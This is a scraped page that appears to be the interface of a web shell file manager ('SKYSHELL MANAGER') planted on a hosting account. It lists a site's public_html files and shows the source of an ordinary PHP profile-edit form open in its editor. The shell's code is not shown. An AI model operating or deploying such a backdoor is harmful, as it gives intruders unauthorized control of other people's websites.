📁
SKYSHELL MANAGER-
🛒
PHP v7.4.33
Create Folder
Create File
Current Path:
home
/
oshofree
/
public_html
/
chbluxuries.com
/
boot
/
Name
Size
Permissions
Actions
📁
..
-
0755
🗑️
🔒
📁
css
-
0755
🗑️
🔒
📁
js
-
0755
🗑️
🔒
📄
config.php
7.06 KB
0444
🗑️
⬇️
✏️
🔒
📄
error_log
322.76 KB
0644
🗑️
⬇️
✏️
🔒
Editing: edit.php
<?php include "header2.php"; ?> <?php // session_start(); ?><?php include "every.php"; include "edita.php"; ?> <body onLoad="getLocation()"> <style> .guy{ margin:0px; padding:0px; } </style> <main id="main"> <!-- =======rack and Book Section ======= --> <section id="about" class="about" > <div class="container" data-aos="fade-up" > <div class="row content"> <div class="col-lg-12" style="padding:20px; width:100%; margin:auto; margin-bottom:100px;" align="center"> <h2 style="color:#FF339A;">EDIT PROFILE DETAILS</h2> <p class="col-lg-12" style="color:#FF339A;"><?php echo "$su"; ?><?php echo "$rw"; ?></p> <form method="post" enctype="multipart/form-data" style=" text-transform:uppercase;"> <p><label>FIRST NAME</label> <input type="text" name="nme"class="form-control" value="<?php echo $name; ?>" required /></p> <p><label>LAST NAME</label> <input type="text" name="nome"class="form-control" value="<?php echo $name2; ?>" required /></p> <p> <label>EMAIL</label> <input type="text" name="em" class="form-control" value="<?php echo $email; ?>"required readonly></p> <p><label>PHONE NUMBER</label> <input type="text" name="add" class="form-control" value="<?php echo $mob; ?>"required readonly /></p> <p><input type="submit" name"submit" value="Update Profile" class="submitn" required /></p> </form> </div> </div></div> </section><!-- Book Section --> </main><!-- End #main --> <?php include "footer2.php"; ?>
💾 Save Changes